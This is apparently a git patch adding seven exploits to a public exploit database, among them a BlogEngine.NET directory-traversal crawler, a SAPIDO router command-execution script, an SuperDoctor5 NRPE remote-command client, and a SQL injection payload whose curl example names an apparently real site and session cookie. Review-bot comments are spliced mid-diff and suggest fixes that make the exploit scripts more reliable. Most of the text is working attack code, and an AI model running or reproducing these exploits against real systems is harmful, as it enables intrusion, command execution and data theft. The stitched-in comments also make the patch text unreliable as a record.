From a90736625a7147d2721572bd2cca183631aeb942 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 26 Jun 2019 05:01:53 +0000
Subject: [PATCH] DB: 2019-06-26
7 changes to exploits/shellcodes
SuperDoctor5 - 'NRPE' Remote Code Execution
SAPIDO RB-1732 - Remote Command Execution
Fortinet FCM-MB40 - Cross-Site Request Forgery / Remote Command Execution
AZADMIN CMS 1.0 - SQL Injection
BlogEngine.NET 3.3.6/3.3.7 - 'path' Directory Traversal
WordPress Plugin iLive 1.0.4 - Cross-Site Scripting
WordPress Plugin Live Chat Unlimited 2.8.3 - Cross-Site Scripting
---
 exploits/aspx/webapps/47035.py | 183 +++++++++++++++++++++++++++
 exploits/hardware/remote/47031.py | 22 ++++
 exploits/hardware/webapps/47033.html | 60 +++++++++
 exploits/multiple/remote/47030.py | 145 +++++++++++++++++++++
 exploits/php/webapps/47034.txt | 35 +++++
 exploits/php/webapps/47036.txt | 33 +++++
 exploits/php/webapps/47037.txt | 26 ++++
 files_exploits.csv | 7 +
 8 files changed, 511 insertions(+)
 create mode 100755 exploits/aspx/webapps/47035.py
 create mode 100755 exploits/hardware/remote/47031.py
 create mode 100644 exploits/hardware/webapps/47033.html
 create mode 100755 exploits/multiple/remote/47030.py
 create mode 100644 exploits/php/webapps/47034.txt
 create mode 100644 exploits/php/webapps/47036.txt
 create mode 100644 exploits/php/webapps/47037.txt
diff --git a/exploits/aspx/webapps/47035.py b/exploits/aspx/webapps/47035.py
new file mode 100755
index 000000000..76a1303fb
--- /dev/null
+++ b/exploits/aspx/webapps/47035.py
@@ -0,0 +1,183 @@ +# Exploit Title: Directory Traversal on BlogEngine.NET +# Date: 24 Jun 2019 +# Exploit Author: Aaron Bishop +# Vendor Homepage: https://blogengine.io/ +# Version: v3.3.7 +# Tested on: 3.3.7, 3.3.6 +# CVE : 2019-10717 + +1. Description +============== + +BlogEngine.NET is vulnerable to a directory traversal. The page parameter, passed to /api/filemanager, reveals the contents of the directory. + +2. Proof of Concept +============= + +Log in to the application and submit a GET request to /api/filemanager: + +Request: + +~~~ +GET /api/filemanager?path=/../../ HTTP/1.1 +Host: $RHOST +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: $COOKIE +Connection: close +Upgrade-Insecure-Requests: 1 +~~~ + +Depending on how the request is submitted, the response may be XML or JSON + +XML Response + +~~~ +HTTP/1.1 200 OK +Cache-Control: no-cache +Pragma: no-cache +Content-Type: application/xml; charset=utf-8 +Expires: -1 +Server: Microsoft-IIS/8.5 +X-Powered-By: ASP.NET +Date: Wed, 15 May 2019 01:58:46 GMT +Connection: close +Content-Length: 13030 + + + + 5/14/2019 6:58:46 PM + + Directory + ~/App_Data/files/../.. + false + ... + 0 + +... +~~~ + +JSON Response + +~~~ +HTTP/1.1 200 OK +Cache-Control: no-cache +Pragma: no-cache +Content-Type: application/json; charset=utf-8 +Expires: -1 +Server: Microsoft-IIS/8.5 +X-Powered-By: ASP.NET +Date: Wed, 15 May 2019 02:35:13 GMT +Connection: close +Content-Length: 10011 + +[ + { + "IsChecked":false, + "SortOrder":0, + "Created":"5/14/2019 7:35:13 PM", + "Name":"...", + "FileSize":"", + "FileType":0, + "FullPath":"~/App_Data/files/../..", + "ImgPlaceholder":"" + } +... 
+~~~ + +import argparse +import json +import os +import re +import requests +import sys + +""" +Exploit for CVE-2019-10717 + +CVE Identified by: Aaron Bishop +Exploit written by: Aaron Bishop + +Outputs list of filenames found in web root + +python exploit.py -t $RHOST + +?path=/../.. +/../../archive.aspx +/../../archive.aspx.cs +/../../archive.aspx.designer.cs +/../../BlogEngine.NET.csproj +/../../BlogEngine.NET.csproj.user +/../../contact.aspx +/../../contact.aspx.cs +/../../contact.aspx.designer.cs +""" + +urls = { + "login": "/Account/login.aspx", + "traversal": "/api/filemanager" + } + +def make_request(session, method, target, data={}): + proxies = { + "http": "127.0.0.1:8080", + "https": "127.0.0.1:8080" + } + if method == 'GET': + r = requests.Request(method, target, params=data) + elif method == 'POST': + r = requests.Request(method, target, data=data) + prep = session.prepare_request(r) + resp = session.send(prep, verify=False, proxies=proxies) + return resp.text + +def login(session, host, user, passwd): + resp = make_request(session, 'GET', host+urls.get('login')) + login_form = re.findall('.*?)"\s+.*?(?P\s+value="(?P.*)")?\s/>', resp) + login_data = dict([(i[0],i[2]) for i in login_form]) + login_data.update({'ctl00$MainContent$LoginUser$UserName': user}) + login_data.update({'ctl00$MainContent$LoginUser$Password': passwd}) + resp = make_request(session, 'POST', host+urls.get('login'), login_data) + +def parse(body, path, outfile): + paths = json.loads(body) + new_paths = set() + for i in paths: + if i.get('FileType') == 0: + new_paths.add(i.get('FullPath')) + else: + outfile.write("{path}\n".format(path=i.get('FullPath'))) + return new_paths + +def traverse(session, host, paths, outfile, visited=set()): + paths = set(paths) - visited + for path in paths: + print path + outfile.write("\n?path={path}\n".format(path=path)) + visited.add(path) + resp = make_request(session, 'GET', host+urls.get('traversal'), data=dict(path=path)) + new_paths = parse(resp, 
path, outfile) + if new_paths: + traverse(session, host, new_paths, outfile, visited) + +def main(host, user, passwd, root, outfile): + with requests.Session() as s: + login(s, host, user, passwd) + traverse(s, host, root, outfile) + +if __name__ == "__main__": + parser = argparse.ArgumentParser(description='Exploit CVE-2019-10717 Path traversal') + parser.add_argument('-t', '--target', action="store", dest="target", required=True, help='Target host') + parser.add_argument('-u', '--user', default="admin", action="store", dest="user", help='Account on blog') + parser.add_argument('-p', '--passwd', default="admin", action="store", dest="passwd", help='Password for account') + parser.add_argument('-r', '--root', nargs='+', default="/../..", help='Starting paths') + parser.add_argument('-s', '--ssl', action="store_true", help="Force SSL") + parser.add_argument('-o', '--outfile', type=argparse.FileType('w'), default='CVE-2019-10717.txt') + args = parser.parse_args() + + protocol = "https://" if args.ssl else "http://" + if isinstance(args.root, str): + args.root = [args.root] + main(protocol + args.target, args.user, args.passwd, args.root, args.outfile) \ No newline at end of file diff --git a/exploits/hardware/remote/47031.py b/exploits/hardware/remote/47031.py new file mode 100755 index 000000000..34e7f2999 --- /dev/null +++ b/exploits/hardware/remote/47031.py 
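Review bot: `make_request` unconditionally sends every request through `proxies = {"http": "127.0.0.1:8080", "https": "127.0.0.1:8080"}`, which looks like a debugging leftover: unless an intercepting proxy is listening on that port the script fails with a connection error before it ever reaches the target. Make the proxy opt-in, e.g. `def make_request(session, method, target, data=None, proxies=None):` and `resp = session.send(prep, verify=False, proxies=proxies)`, and pass a `--proxy` argument down from `main`. `login` never checks that the POST actually established a session, so a wrong password only surfaces later when `json.loads` in `parse` raises on a non-JSON response. The mutable defaults `data={}` and `visited=set()` should be `None` with an in-body fallback, and the `re.findall` pattern as rendered here is missing its opening tag and group names, which is probably an artefact of how the patch is displayed rather than the committed text.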
@@ -0,0 +1,22 @@ +# Exploit Title: SAPIDO RB-1732 command line execution +# Date: 2019-6-24 +# Exploit Author: k1nm3n.aotoi +# Vendor Homepage: http://www.sapido.com.tw/ +# Software Link: http://www.sapido.com.tw/CH/data/Download/firmware/rb1732/tc/RB-1732_TC_v2.0.43.bin +# Version: RB-1732 V2.0.43 +# Tested on: linux + + +import requests +import sys + +def test_httpcommand(ip, command): + my_data = {'sysCmd': command, 'apply': 'Apply', 'submit-url':'/syscmd.asp', 'msg':''} + r = requests.post('http://%s/goform/formSysCmd' % ip, data = my_data) + content = r.text + content = content[ + content.find('')] + return content + +print test_httpcommand(sys.argv[1], " ".join(sys.argv[2:])) \ No newline at end of file diff --git a/exploits/hardware/webapps/47033.html b/exploits/hardware/webapps/47033.html new file mode 100644 index 000000000..5b36854f5 --- /dev/null +++ b/exploits/hardware/webapps/47033.html @@ -0,0 +1,60 @@ +# Exploit Title: FCM-MB40 Remote Command Execution as Root via CSRF +# Date: 2019-06-19 +# Exploit Author: @XORcat +# Vendor Homepage: https://fortinet.com/ +# Software Link: Customer Account Required +# Version: v1.2.0.0 +# Tested on: Linux +# CVE : TBA + + + + + + + +
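Review bot: `test_httpcommand` is called with `sys.argv[1]` and `sys.argv[2:]` without checking that any arguments were supplied, so running the script bare ends in an `IndexError` traceback instead of a usage line; add `if len(sys.argv) < 3: sys.exit("usage: 47031.py IP COMMAND")` before the call. `requests.post(...)` has no `timeout=`, so an unreachable device hangs the script indefinitely. The slicing expression around `content.find('')` appears to have lost its marker strings in this rendering; if the committed text really has empty markers, the slice does not isolate the command output from the page body. The header also does not say whether `/goform/formSysCmd` is reachable without an authenticated session, which is the detail an operator needs to judge exposure.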

Welcome to my non-malicious website.

+ + \ No newline at end of file diff --git a/exploits/multiple/remote/47030.py b/exploits/multiple/remote/47030.py new file mode 100755 index 000000000..4702913a9 --- /dev/null +++ b/exploits/multiple/remote/47030.py 
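Review bot: The `# Exploit Title:` through `# CVE : TBA` header lines at the top of this `.html` file are plain text, not HTML comments, so a browser renders them as visible text above the page body; wrapping the block in `<!-- ... -->` keeps the metadata without changing what the page displays. In this rendering the markup of the hunk has been stripped, leaving only the header and the sentence `Welcome to my non-malicious website.`, so the form that performs the cross-site request cannot be reviewed from this view. The header also gives no fixed version or vendor advisory reference, which is the information an FCM-MB40 operator needs to decide whether to patch.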
@@ -0,0 +1,145 @@ +# SuperMicro implemented a Remote Command Execution plugin in their implementation of +# NRPE in SuperDocter 5, which is their monitoring utility for SuperMicro chassis'. +# This is an intended feature but leaves the system open (by default) to unauthenticated +# remote command execution by abusing the 'executable' plugin with an NRPE client. +# +# For your pleasure, here is a PoC Python NRPE Client that will connect, execute the +# cmd of choice and return its output. +# +# To mitigate this vulnerbility, edit your agent.cfg to specificy which IPs are allowed +# to execute NRPE commands agaist the system and/or block traffic on port 5666. +# +# NRPE cannot be disabled in this software, see Guide section 3.2 + + +#Author: Simon Gurney +#Date: 23/05/2019 +#Vendor: SuperMicro +#Product: SuperMicro Super Doctor 5 +#Version: 5 +#Guide: ftp://supermicro.com/ISO_Extracted/CDR-C9_V1.00_for_Intel_C9_platform/SuperDoctor_V/Linux/SuperDoctor5_UserGuide.pdf + + + +### Configurables + +command = "ping 1.1.1.1 -n 1" +target = "1.2.3.4" +target_port = 5666 + +### Don't need to change anything below + +import binascii +import struct +import socket +import ssl + +#### Struct Encoding Types +StructCodeInt16 = "!h" ## Unsigned Int16 +StructCodeInt32 = "!L" ## Unsigned Int32 + +#### NRPE Specific definitions +NRPE_Version = ("","One", "Two", "Three") +NRPE_Packet_Type = ("", "Query", "Response") +NRPE_Response = ("Ok", "Warning", "Critical", "Unknown") +NRPE_Version_1 = 1 +NRPE_Version_2 = 2 +NRPE_Version_3 = 3 +NRPE_Packet_Type_Query = 1 +NRPE_Packet_Type_Response = 2 +NRPE_Response_Ok = 0 +NRPE_Response_Warning = 1 +NRPE_Response_Critical = 2 +NRPE_Response_Unknown = 3 +NRPE_Response_Type_Query = 3 + +#### RandomDefintions +NullByte = b"\x00" +TwoCharSuffix = "SG" + +class NRPEpacket: + port = 5666 + server = "127.0.0.1" + nrpeVersion = NRPE_Version_2 + nrpePacketType = NRPE_Packet_Type_Query + nrpeResponseCode = NRPE_Response_Type_Query + ownSocket = None + def 
CalculateCRC(self): + tempBuffer = struct.pack(StructCodeInt16,self.nrpeVersion) + tempBuffer += struct.pack(StructCodeInt16,self.nrpePacketType) + tempBuffer += NullByte * 4 + tempBuffer += struct.pack(StructCodeInt16,self.nrpeResponseCode) + tempBuffer += self.content + return (struct.pack(StructCodeInt32, binascii.crc32(tempBuffer) & 0xffffffff)) + def PadTo1024Bytes(self,command): + if len(command) <= 1024: + tempBuffer = command + else: + Error("Command string is too long!") + while len(tempBuffer) < 1024: + tempBuffer += "\x00" + tempBuffer += TwoCharSuffix + return tempBuffer.encode() + def Connect(self): + self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + self.socket.connect((self.server,self.port)) + def WrapSSL(self): + self.socket = ssl.wrap_socket(self.socket,cert_reqs=ssl.CERT_NONE, ssl_version=ssl.PROTOCOL_SSLv23, ciphers="ALL") + def Send(self): + tempBuffer = struct.pack(StructCodeInt16,self.nrpeVersion) + tempBuffer += struct.pack(StructCodeInt16,self.nrpePacketType) + tempBuffer += self.crc + tempBuffer += struct.pack(StructCodeInt16,self.nrpeResponseCode) + tempBuffer += self.content + self.socket.send(tempBuffer) + def Recv(self): + tempBuffer = self.socket.recv(2048) + self.nrpeVersion = struct.unpack(StructCodeInt16,tempBuffer[0:2])[0] + self.nrpePacketType = struct.unpack(StructCodeInt16,tempBuffer[2:4])[0] + self.crc = tempBuffer[4:8] + self.nrpeResponseCode = struct.unpack(StructCodeInt16,tempBuffer[8:10])[0] + self.content = tempBuffer[10:] + if self.crc != self.CalculateCRC(): + print ("CRC does not match!") + def PrintOut(self): + print(" -=-=-=-= Begin NRPE Content =-=-=-=-") + print("| NRPE Version = %i - %s" % (self.nrpeVersion,NRPE_Version[self.nrpeVersion])) + print("| NRPE Packet Type = %i - %s" % (self.nrpePacketType,NRPE_Packet_Type[self.nrpePacketType])) + print("| NRPE Packet CRC = %i" % struct.unpack(StructCodeInt32,self.crc)[0]) + print("| NRPE Response Code = %i - %s" % 
(self.nrpeResponseCode,NRPE_Response[self.nrpeResponseCode])) + print("| Packet Content:") + print("| %s" % self.content.decode().strip(TwoCharSuffix).strip("\x00")) + print(" -=-=-=-= End NRPE Content =-=-=-=-") + def Close(self): + if not self.ownSocket: + self.socket.close() + def AutoSend(self): + print("Sending...") + self.PrintOut() + self.Send() + print("Receiving...") + self.Recv() + self.PrintOut() + self.Close() + def __init__(self, command, socket=None, server=None, port = None, ssl=True): + self.content = self.PadTo1024Bytes(command) + self.crc = self.CalculateCRC() + if server: + self.server = server + if port: + self.port = port + if not socket: + self.Connect() + else: + self.socket = socket + self.ownSocket = True + if ssl == True: + self.WrapSSL() + + +#NRPE CMD format is "executable!! i.e." +#NRPEpacket("executable!ping!1.1.1.1 -n 1", server="1.2.3.4").AutoSend() + +split = command.split(" ",1) +cmd = "executable!" + split[0] + "!" + split[1] +NRPEpacket(cmd, server=target, port=target_port).AutoSend() \ No newline at end of file diff --git a/exploits/php/webapps/47034.txt b/exploits/php/webapps/47034.txt new file mode 100644 index 000000000..a7f543b7d --- /dev/null +++ b/exploits/php/webapps/47034.txt 
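Review bot: `PadTo1024Bytes` calls `Error("Command string is too long!")`, a name that is not defined anywhere in the file, so an over-long command raises `NameError`, and even if that call returned, `tempBuffer` would be unbound in the `while` loop that follows; replace it with `raise ValueError("Command string is too long!")`. `Recv` trusts a single `self.socket.recv(2048)` to return the whole response and only prints on a CRC mismatch, so a short read is parsed as a truncated packet without any error being raised. The comments on `StructCodeInt16 = "!h"` and `StructCodeInt32 = "!L"` say `Unsigned Int16` / `Unsigned Int32`, but `h` is a signed short (`H` would be unsigned). The `__init__` parameters `socket` and `ssl` shadow the imported modules inside that method; renaming them (e.g. `sock`, `use_ssl`) avoids a trap for anyone extending the class.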
@@ -0,0 +1,35 @@ +[+] Sql Injection on AZADMIN CMS of HIDEA v1.0 + +[+] Date: 24/06/2019 + +[+] CWE Number : CWE-89 + +[+] Risk: High + +[+] Author: Felipe Andrian Peixoto + +[+] Vendor Homepage: https://www.hidea.com/ + +[+] Contact: felipe_andrian@hotmail.com + +[+] Tested on: Windows 7 and Linux + +[+] Vulnerable Files: news_det.php + +[+] Dork : inurl:"news_det.php?cod=" HIDEA + +[+] Exploit : https://www.site.com/news_det.php?cod=[SQL Injection] + +[+] Payload : /*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+- + +[+] PoC: + http://site.com/news_det.php?cod=-1/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+- + + https://site.com/news_det.php?cod=77/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+- + +[+] Example: + + curl 'http://site.com/news_det.php?cod=-1/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+-' -H 'Host: www.centroconcept.com.br' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3' --compressed -H 'Cookie: PHPSESSID=dv0rd3b6rbghah80getonfp601' -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Upgrade-Insecure-Requests: 1' + + XPATH syntax error: ' + s3x0u:centroco_ger:s3x0u' \ No newline at end of file diff --git a/exploits/php/webapps/47036.txt b/exploits/php/webapps/47036.txt new file mode 100644 index 000000000..bd740135b --- /dev/null +++ b/exploits/php/webapps/47036.txt 
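Review bot: The `curl` example embeds what look like real third-party identifiers — `Host: www.centroconcept.com.br`, a concrete `PHPSESSID` cookie value, and the extracted database name `centroco_ger` in the error output — while the rest of the advisory uses the `site.com` placeholder; these should be redacted to placeholders before publication, since the advisory otherwise documents a specific live site and session. The advisory also lists no vendor fix or notification status and no mitigation (the `cod` parameter should be cast to an integer and bound in a prepared statement), which is what an AZADMIN operator reading it needs.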
@@ -0,0 +1,33 @@ +# Exploit Title: iLive - Intelligent WordPress Live Chat Support +Plugin v1.0.4 Stored XSS Injection +# Google Dork: - +# Date: 2019/06/25 +# Exploit Author: m0ze +# Vendor Homepage: http://www.ilive.wpapplab.com/ +# Software Link: +https://codecanyon.net/item/ilive-wordpress-live-chat-support-plugin/20496563 +http://www.ilive.wpapplab.com/ +# Version: 1.0.4 +# Tested on: Windows 10 / Parrot OS +# CVE : - + +Info: + +Weak security measures like bad textarea data filtering has been +discovered in the «iLive - Intelligent WordPress Live Chat Support +Plugin». Current version of this premium WordPress plugin is 1.0.4. + + + +PoC: +Go to the demo website http://www.site.com/ and open chat window by clicking on «Chat» icon on the bottom right corner. +Use your payload inside input field and press [Enter]. +Provided exaple payloads working on the admin area, so it's possible to steal admin cookies or force a redirect to any other website. +To check your XSS Injections log in http://www.site.com/wp-admin/ and go to this page http://www.site.com/wp-admin/admin.php?page=ilive-chat-page then select your chat alias from the list. Keep in mind that there is 3 demo operators, so you must log in as operator assigned to your chat (operator number will be available after you send the first message in chat). + +Example #1: +Example #2: +Example #3: +Example #4: +Example #5: \ No newline at end of file diff --git a/exploits/php/webapps/47037.txt b/exploits/php/webapps/47037.txt new file mode 100644 index 000000000..c110d6d72 --- /dev/null +++ b/exploits/php/webapps/47037.txt 
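Review bot: The advisory states `bad textarea data filtering` but never names the request field or handler that stores the chat message unescaped, nor where in `admin.php?page=ilive-chat-page` it is echoed, so a reader cannot confirm the finding or verify a fix; a sentence naming the stored field and the output point would make the report actionable. There is no remediation guidance (escape chat messages on output in the operator view) and no vendor notification or fixed-version status. The same gaps apply to the Live Chat Unlimited advisory in `exploits/php/webapps/47037.txt`, and both contain the typo `exaple` for `example`. The `Example #1` through `Example #5` payload lines are empty in this rendering, which looks like an artefact of markup being stripped rather than the committed text.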
@@ -0,0 +1,26 @@ +# Exploit Title: Live Chat Unlimited v2.8.3 Stored XSS Injection +# Google Dork: inurl:"wp-content/plugins/screets-lcx" +# Date: 2019/06/25 +# Exploit Author: m0ze +# Vendor Homepage: https://screets.com/ +# Software Link: https://codecanyon.net/item/wordpress-live-chat-plugin/3952877 +# Version: 2.8.3 +# Tested on: Windows 10 / Parrot OS +# CVE : - + + +Info: + +Weak security measures like bad input field data filtering has been +discovered in the «Live Chat Unlimited». Current version of this +premium WordPress plugin is 2.8.3. + + + +PoC: + +Go to the demo website https://site.com/try/lcx/night-bird/ and open chat window by clicking on «Open/close» link, then click on «Online mode» to go online. Use your payload inside input field and press [Enter]. +Provided exaple payloads working on the admin area, so it's possible to steal admin cookies or force a redirect to any other +website. +Example #1: m0ze +Example #2: m0ze \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 618be972a..a44941168 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
@@ -17511,6 +17511,8 @@ id,file,description,date,author,type,platform,port
 46999,exploits/php/remote/46999.rb,"AROX School-ERP Pro - Unauthenticated Remote Command Execution (Metasploit)",2019-06-17,AkkuS,remote,php,
 47016,exploits/linux/remote/47016.rb,"Cisco Prime Infrastructure Health Monitor - TarArchive Directory Traversal (Metasploit)",2019-06-20,Metasploit,remote,linux,
 47019,exploits/windows/remote/47019.txt,"EA Origin < 10.5.38 - Remote Code Execution",2019-06-21,"Dominik Penner",remote,windows,
+47030,exploits/multiple/remote/47030.py,"SuperDoctor5 - 'NRPE' Remote Code Execution",2019-06-25,"Simon Gurney",remote,multiple,
+47031,exploits/hardware/remote/47031.py,"SAPIDO RB-1732 - Remote Command Execution",2019-06-25,k1nm3n.aotoi,remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41429,3 +41431,8 @@ id,file,description,date,author,type,platform,port
 47024,exploits/php/webapps/47024.txt,"SeedDMS < 5.1.11 - 'out.GroupMgr.php' Cross-Site Scripting",2019-06-24,"Nimit Jain",webapps,php,
 47022,exploits/php/webapps/47022.txt,"SeedDMS versions < 5.1.11 - Remote Command Execution",2019-06-24,"Nimit Jain",webapps,php,
 47027,exploits/multiple/webapps/47027.py,"GrandNode 4.40 - Path Traversal / Arbitrary File Download",2019-06-24,"Corey Robinson",webapps,multiple,
+47033,exploits/hardware/webapps/47033.html,"Fortinet FCM-MB40 - Cross-Site Request Forgery / Remote Command Execution",2019-06-25,XORcat,webapps,hardware,
+47034,exploits/php/webapps/47034.txt,"AZADMIN CMS 1.0 - SQL Injection",2019-06-25,"felipe andrian",webapps,php,
+47035,exploits/aspx/webapps/47035.py,"BlogEngine.NET 3.3.6/3.3.7 - 'path' Directory Traversal",2019-06-25,"Aaron Bishop",webapps,aspx,
+47036,exploits/php/webapps/47036.txt,"WordPress Plugin iLive 1.0.4 - Cross-Site Scripting",2019-06-25,m0ze,webapps,php,
+47037,exploits/php/webapps/47037.txt,"WordPress Plugin Live Chat Unlimited 2.8.3 - Cross-Site Scripting",2019-06-25,m0ze,webapps,php,